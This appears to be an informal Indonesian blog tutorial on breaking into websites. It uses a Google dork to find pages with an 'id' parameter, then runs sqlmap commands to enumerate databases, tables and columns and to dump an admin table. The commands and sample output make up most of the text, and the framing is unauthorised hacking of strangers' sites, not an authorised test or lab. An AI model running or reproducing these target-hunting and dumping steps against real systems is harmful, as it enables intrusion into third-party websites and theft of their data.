Hack Web Dengan "sqlmap" auto sql injections - Backtrack

sebelumnya harus persiapkan dulu 

1 set PC/Laptop/Notebook yang telah tekoneksi ke internet, #ngajak ribut nih orang, wkwkwk

Pastikan PC/Laptop/NoteBook ente sudah terinstall Backtrack,

Tambahannya silahkan siapkan rokok, minuman atau cemilan kalo mau... Jangan minta yak :p
OK, sip! #sql map udah terinstall dan siap untuk di jalankan di backtrack masing-masing.



Pertama, cari target dengan google dork, lihat daftar dork yang sering di gunakan disini
kali ini mrq menggunakan dork

inurl:product.php?id=

sebagai tambahan, gunakan seni googling kalian untuk mendapatkan dork  yang bisa di manfaatkan :-D
OK, sekarang anggap kita sudah mendapatkan target,

Sekarang buka terminal, dan ketik/copas command berikut

cd /pentest/database/sqlmap

dan untuk command berikutnya,

python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 --dbs

OK, sekarang kita dapat 4 database

available databases [4]:

[*] information_schema

[*] LIGHT_SPEED_OUTDOORS

[*] LIGHT_SPEED_TENTS

[*] test

Selanjutnya mari kita lihat apasih yang ada di balik database itu,

python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 -D LIGHT_SPEED_OUTDOORS --tables

Nah, menurut ente mana dari nama table yang mencurigakan? hhmmm mari kita coba WEB_SESSION
Commandnya seperti ini

python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 -T WEB_SESSION --columns

Wew, ente dapat apa?

Untuk melihat ada apa di baliknya, gunakan Command berikut

python sqlmap.py -u http://www.target-ente.com/product.php?id=2 -T admin -U test --dump

Udah belum? kalo udah ya berarti beres!
Loh, segitu doank? #yap, selanjutnya silahkan ente kerjakan sendiri ye...